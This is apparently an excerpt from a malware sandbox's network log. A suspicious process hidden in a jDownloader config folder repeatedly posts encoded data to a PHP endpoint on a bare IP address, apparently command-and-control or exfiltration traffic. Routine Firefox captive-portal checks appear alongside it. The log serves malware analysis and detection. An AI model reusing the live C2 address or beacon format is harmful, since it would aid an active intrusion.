Dec 8, 2024 19:54:01.434223890 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1064 Expect: 100-continue
Dec 8, 2024 19:54:01.785824060 CET	1064	OUT	Data Raw: 54 53 43 5a 5a 5e 55 52 5c 5e 5b 53 52 5c 50 5e 56 52 54 58 50 5c 54 45 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TSCZZ^UR\^[SR\P^VRTXP\TESVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&Z+<[$)4654^+,[ *[140?X/Y-?,C?W &'F.#]->
Dec 8, 2024 19:54:02.765435934 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:54:02.997817993 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49949	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:03.275362015 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:54:03.631057978 CET	1072	OUT	Data Raw: 51 5b 43 5e 5f 5b 55 5f 5c 5e 5b 53 52 5a 50 5e 56 5b 54 5e 50 5b 54 49 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: Q[C^_[U_\^[SRZP^V[T^P[TISVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&]+/:3:+"5(?#\8_2,'#?+[-4?!3Z%'F.#]->
Dec 8, 2024 19:54:04.654530048 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:54:04.893147945 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49957	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:05.209551096 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1064 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:54:05.567339897 CET	1064	OUT	Data Raw: 54 53 46 5d 5f 5d 55 53 5c 5e 5b 53 52 5c 50 5b 56 5f 54 5e 50 59 54 41 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TSF]_]US\^[SR\P[V_T^PYTASVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&\<:[0:(!$+0Z#)'1Z7Z0'$T).-/ B(!Y'<'F.#]-*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49963	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:06.192603111 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:54:06.556303978 CET	1788	OUT	Data Raw: 51 58 46 5a 5f 5c 55 5e 5c 5e 5b 53 52 5f 50 51 56 5f 54 5f 50 58 54 45 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: QXFZ_\U^\^[SR_PQV_T_PXTESVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&]?/:\&:#"%+<; ?&,$$8<-09@<2;&'F.#]-
Dec 8, 2024 19:54:07.554116011 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:54:07.789084911 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 39 11 22 3b 2b 1c 22 2a 31 50 2e 38 21 01 28 58 31 06 2d 5e 35 1d 2a 23 34 00 3c 3c 30 5b 3f 3d 37 06 27 55 36 14 22 1c 3f 1d 25 0e 20 5b 0d 1e 27 1b 34 30 2f 53 3c 1d 0f 1c 2f 09 04 59 25 3f 3d 03 35 5c 30 0d 24 3b 14 05 3f 32 36 0e 28 23 02 19 24 39 24 58 33 2e 2c 01 3e 3b 21 57 0c 11 21 56 25 33 34 1d 36 0c 1a 59 32 0c 3f 1e 35 25 3d 0c 29 0d 2e 5c 27 3f 0d 5d 2d 3b 3e 05 35 1f 3c 11 2e 06 21 06 21 2d 2b 54 29 03 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 989";+"1P.8!(X1-^5#4<<0[?=7'U6"?% ['40/S</Y%?=5\0$;?26(#$9$X3.,>;!W!V%346Y2?5%=).\'?]-;>5<.!!-+T).R#.R?[O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49970	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:06.576520920 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:54:06.939522028 CET	1072	OUT	Data Raw: 54 5a 43 5a 5a 5a 55 5f 5c 5e 5b 53 52 5a 50 5c 56 58 54 5c 50 55 54 40 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TZCZZZU_\^[SRZP\VXT\PUT@SVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&[+?%'#_55(, !94Z&,0(,9?+?! %'F.#]->
Dec 8, 2024 19:54:07.942722082 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:54:08.174475908 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49971	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:06.576539993 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:07.685395002 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37581 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49982	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:07.980572939 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:09.330005884 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54045 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:09.340887070 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:09.659729004 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54045 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:09.888225079 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:10.203780890 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54046 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:10.422328949 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:10.736171007 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54046 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:10.871118069 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:11.185210943 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54047 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:11.546797991 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:11.863540888 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54047 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:12.427329063 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:12.743031025 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54048 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:12.962245941 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:13.276350975 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54049 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:15.115178108 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:15.481899977 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54051 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 8, 2024 19:54:22.130014896 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 8, 2024 19:54:22.448090076 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 08 Dec 2024 03:53:24 GMT Age: 54058 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49983	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:07.980766058 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:09.336388111 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37583 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:09.561820984 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:09.883687019 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37583 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:10.092381954 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:10.407912016 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37584 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:10.553981066 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:10.868617058 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37584 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:11.222229958 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:11.536494970 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37585 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:12.070741892 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:12.385586023 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37586 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:12.639302969 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:12.956096888 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37586 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:14.758013010 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:15.081479073 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37588 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:21.751689911 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
